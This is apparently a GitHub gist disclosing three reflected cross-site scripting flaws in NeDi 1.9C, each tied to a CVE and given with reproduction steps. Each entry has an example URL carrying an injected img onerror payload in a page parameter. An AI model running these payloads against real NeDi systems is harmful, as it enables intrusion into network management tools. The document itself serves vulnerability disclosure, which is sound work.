Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Description:-
NeDi 1.9C is vulnerable to a cross-site scripting (XSS) attack.
The application allows an attacker to execute arbitrary JavaScript code via the "Reports-Devices.php" page on "st[]" parameter.
Steps To Reproduce:-
1. Login to the Application.
2. Go to "https://ip/Reports-Devices.php" page.
3. Add st[] parameter at the end of the URL.
Example:- https://ip/Reports-Devices.php?in[]=device&op[]=~&st[]="><img src=x onerror=alert(document.domain)>&lir=10
Reference: CVE-2020-15037
Description:-
NeDi 1.9C is vulnerable to a cross-site scripting (XSS) attack.
The application allows an attacker to execute arbitrary JavaScript code via the "Topology-Linked.php" page on "dv" parameter.
Steps To Reproduce:-
1. Login to the Application.
2. Go to "https://ip/Topology-Linked.php" page.
3. Add dv parameter at the end of the URL.
Example:- https://ip/Topology-Linked.php?dv=<img src=x onerror=alert(document.domain)>
Reference: CVE-2020-15036
Description:-
NeDi 1.9C is vulnerable to a cross-site scripting (XSS) attack.
The application allows an attacker to execute arbitrary JavaScript code via the "Monitoring-Map.php" page on "hde" parameter.
Steps To Reproduce:-
1. Login to the Application.
2. Go to "https://ip/Monitoring-Map.php" page.
3. Add tet parameter at the end of the URL.
Example:- https://ip/Monitoring-Map.php?hde="><img src=x onerror=alert(document.domain)>
Reference: CVE-2020-15035
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment